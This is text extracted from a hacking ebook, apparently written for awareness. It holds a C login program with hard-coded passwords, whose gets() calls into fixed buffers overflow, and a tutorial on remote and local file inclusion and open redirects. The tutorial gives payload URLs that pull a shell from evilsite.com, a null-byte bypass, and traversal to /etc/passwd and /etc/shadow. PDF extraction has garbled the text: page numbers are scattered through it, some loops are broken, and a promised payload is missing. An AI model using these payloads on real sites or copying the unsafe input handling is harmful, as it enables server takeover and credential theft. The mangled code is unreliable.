// defines how long the username/password should be. For a unix system, the length is 8. #define MAXLENGTH 8 // increase this if more users are added to this system. #define LISTLENGTH 5 /* Structure used to store the list of user names and their corresponding passwords. More names can be added by increasing the array length. */ struct usrlst { char *unames[10]; char *passwd[10]; }; //Function prototypes void init_list(struct usrlst *u); int get_indx(char *pch, struct usrlst *u); void encode_passwd(const char *, char *); /* The main program. */ int main (void) { struct usrlst usr; int i=0, pass_indx=-2; char ch_tmp='\0'; // keep the length of the string one greater than the MAXLENGTH to accomodate the '\0' character at the end. char buffer[4][MAXLENGTH+1]; char *usrname, *usrpasswd, *sys_enc_pass, *usr_enc_pass; usrname = buffer[0]; usrpasswd = buffer[1]; sys_enc_pass = buffer[2]; usr_enc_pass = buffer[3]; //printf("<%p>,<%p>,<%p>,<%p>\n",&usrname[0],&usrpasswd[0],&sys_enc_pass[0],&usr_enc_pass[0]); printf("Password table is shown as below:\n"); printf("Username \t\t Password \t Encrypted Password\n"); printf(" joe \t\t\t ilovemsu \t\t loryhpvx\n"); printf(" bob \t\t\t manitoba \t\t pdqlwred\n"); printf(" john \t\t\t inbombay \t\t lperpedb\n"); printf(" marc \t\t\t hiobiwan \t\t klrelzdq\n"); printf(" alice \t\t cometous \t\t frphwrxv\n"); init_list(&usr);
55
printf("Please enter your username (lowercase): "); gets(usrname); if(strlen(usrname)>0) pass_indx = get_indx(usrname, &usr); else printf("You entered an invalid username.\nPlease try again.\nGoodbye!!\n"); if(pass_indx >= 0){ strcpy( sys_enc_pass, usr.passwd[pass_indx] ); //printf("The sys passwd is: %s\n",sys_enc_pass); printf("Please enter the password for user %s: ", usrname); ch_tmp='\0'; i=0; for (;;){ ch_tmp = getch(); if(i==MAXLENGTH){ usrpasswd[i] = '\0'; i++; } if(ch_tmp=='\r'){ printf("\n"); break; } usrpasswd[i]=ch_tmp; //putchar(ch_tmp); //uncomment this if you want to echo the password on
the screen
putchar('*');
of * }
//comment this if you want to see the password instead
i++;
//printf("The password you entered is: %s\n", usrpasswd); encode_passwd(usrpasswd, usr_enc_pass); printf("<%s>,<%s>,<%s>,<%s>\n",usrname,usrpasswd,sys_enc_pass,usr_enc_pass); if( !strcmp( usr_enc_pass, sys_enc_pass ) ){ printf("Thank you, your password has been accepted.\nWelcome!!\n"); } else{ printf("Sorry, your password was not accepted.\nPlease try again.\nGoodbye!!\n"); } } system("pause"); return 0; } /* Encrypt the user entered password and return the caeser cipher back. The substitution is simply to replace an alphabet with a letter standing three places down the alphabet. Also note, the replacement alphabets wrap around viz: z->c */ void encode_passwd(const char* s, char *r){ int i, ch; for(i=0; i 122 ) ch -= 26; r[i] = ch; } r[MAXLENGTH] = '\0'; } /* check if the username exists in the database. if does, get the index of its corresponding password. return -1 if the username is not found. */ int get_indx(char *pch, struct usrlst *u){
56
int i; for (i=0; iunames[i])) break; } if(i
return -1; }
/* store all the usernames and passwords in the usrlst structure. */ void init_list(struct usrlst *u){ u->unames[0]="joe"; u->unames[1]="bob"; u->unames[2]="john"; u->unames[3]="marc"; u->unames[4]="alice";
u->passwd[0]="loryhpvx"; u->passwd[1]="pdqlwred"; u->passwd[2]="lqerpedb"; u->passwd[3]="klrelzdq"; u->passwd[4]="frphwrxv";
//ilovemsu //manitoba //inbombay //hiobiwan //cometous
}
RFI It’s not only input validation attacks which can damage a server but believe me RFI can do it also with the same ease. It is a vulnerability which allows an attacker to remotely include files on a server. It is easier than a sql injection. After uploading a shell an attacker can root the server, deface website’s hosted on it, steal source code of website’s etc. Demo of RFI http://vulnerablesite.com/index.php? page=http://evilsite.com/shell.php
57
If the site opens an iframe on the current page then the website is vulnerable Things Needed: • Shell • A webhost which will host your shell • If it automatically adds extension to the file then we must use null byte “%00” (without quotes) to avoid any error http://vulnerablesite.com/index.php? page=http://evilsite.com/shell.php%00
Else our request will become like below which is incorrect way http://vulnerablesite.com/index.php? page=http://evilsite.com/shell.php.php
Impacts of RFI: • Remote code Execution on a web server • Code Execution on Client side • Document Hijacking including Database it is stored o • Source code theft • DDos
LFI LFI or Local File Inclusion is opposite of RFI in LFI file’s on the server are included rather than remotely including as in RFI. In LFI an attacker can view as well as execute a local file in the server. After successfully exploiting a lfi vulnerability an attacker can execute remote code n the machine.
58
In a Unix based Server can get hold of some important files like /etc/passwd , /etc/shadow, /etc/release , /proc/self/eviron etc Some of the important files which an attacker can get on a windows based machine \boot.ini , \php.ini , \Program Files\Apache Software Foundation\Apache\conf\logs\access.log , \Program Files\Apache Software Foundation\Apache\conf\logs\error.log etc; The Vulnerable URL look like this http://www.vulnerablesite.com/index.php? page=../../../../../etc/passwd
or using a null byte if it add file extension automatically http://www.vulnerablesite.com/index.php? page=../../../../../etc/passwd%00
(List of system accounts, username & hashes from /etc/passwd) After finding a vulnerable site an attacker can execute code on the machine using user agent changer software. You can use this User Agent Changer it has a easy GUI. An attacker changes the User Agent to the Code which he wants to get 59
executed. In below example attacker enter the following code This code will upload a a shell in shell.txt form & later rename it to shell.php
60
Open Redirection These vulnerabilities are affected in parameters of an application which redirect a user to the different website without validation. This can cause a serious privacy threat to the user. An attacker can redirect a user to a phishing page or a specially crafted malicious page contacting malware thus can control victims PC from remote. An attacker can exploit this vulnerability like this 61
http://securesite.com/index.php? page=http://evilsite.tld When a victim clicks on this URL victim will be redirected to the http://evilsite.tld without any validation. Thus an attacker can hijack accounts, install malware, redirect to phishing pages etc. This vulnerability is featured in many bug bounty programs & the payout is from 300$ - 500$ & even more.
About This book has been written by Ubaid aka $cr1pt Kid33. Founder & Designer of xedlgubaid.blogspot.com. This book has been written to aware about latest security threats. Author has been acknowledged by Paypal inc & has found many security vulnerabilities in various internet giants. Feel free to contact author at mailto:[email protected] “Thanks To All those who said no, it’s only because of them I did it myself”
62